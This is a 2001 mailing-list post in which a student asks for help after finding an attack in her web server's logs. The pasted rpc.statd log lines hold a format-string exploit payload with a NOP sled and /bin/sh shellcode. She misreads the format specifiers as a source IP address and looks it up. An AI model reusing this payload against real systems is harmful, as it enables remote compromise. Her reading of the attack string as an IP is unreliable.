[techtalk] Should I feel honored?
Kath
ranger at optonline.net
Fri Apr 20 17:39:38 EST 2001
I decided to review my own logs (I know I should do it more often).
Apparently, my web server has been attacked repeatedly and if the IP is true (If I am reading it right, maybe it is just mumbo jumbo I'm misinterpreting), it is coming from USC.
Here is the log:
Apr 18 15:25:08 hwnet /sbin/rpc.statd[177]: gethostbyname error for ^X\xf7\xff\xbf^X\xf7\xff\xbf^Y\xf7\xff\xbf^Y\xf7\xff\xbf^Z\xf7\xff\xbf^Z\xf7\xff\xbf^[\xf7
\xff\xbf^[\xf7\xff\xbf%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
Apr 18 15:25:08 hwnet \xc7^F/bin\xc7F^D/shA0\xc0\210F^G\211v^L\215V^P\215N^L\211\xf3\xb0^K\xcd\200\xb0^A\xcd\200\xe8\177\xff\xff\xff
Now, if I am not reading too much into it, I clearly see the IP "236x%n%137x%n%10x%n%192". Does that mean 236.137.10.192?
Now popping that IP into the whois at arin.net yielded this:
University of Southern California (NET-MCAST-NET)
Information Sciences Institute
4676 Admiralty Way
Marina Del Rey, CA 90292-6695
US
Netname: MCAST-NET
Netblock: 224.0.0.0 - 239.255.255.255
Coordinator:
Internet Corporation for Assigned Names and Numbers (IANA-ARIN) iana at IANA.ORG
(310) 823-9358
Domain System inverse mapping provided by:
FLAG.EP.NET 198.32.4.13
STRUL.STUPI.SE 192.108.200.1 192.36.143.3
NS.ISI.EDU 128.9.128.127
NIC.NEAR.NET 192.52.71.4
Record last updated on 12-Sep-2000.
Database last updated on 20-Apr-2001 00:14:29 EDT.
Could it be a spoofed address? A compromised machine doing the scanning? Some script kiddy kid sitting in his dorm room?
What is my course of action now? My main page hasn't been defaced with pictures of someones grandma in compromising poses, so I guess that is a good first sign the attack didn't work? Or did it work and my machine has been compromised and is now being used for DDoS or a w4r3z britney spears mp3 porn server?
I will notify the sysadmin of my school district (I'm a student) of this of course.
If that IP is true, should I be contacting a USC sysadmin? I would feel especially responsible if it was some poor sysadmin's compromised machine at another school.
- Kath, the perpetually worried
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://linuxchix.org/pipermail/techtalk/attachments/20010420/9dbf1e00/attachment.xhtml
More information about the Techtalk
mailing list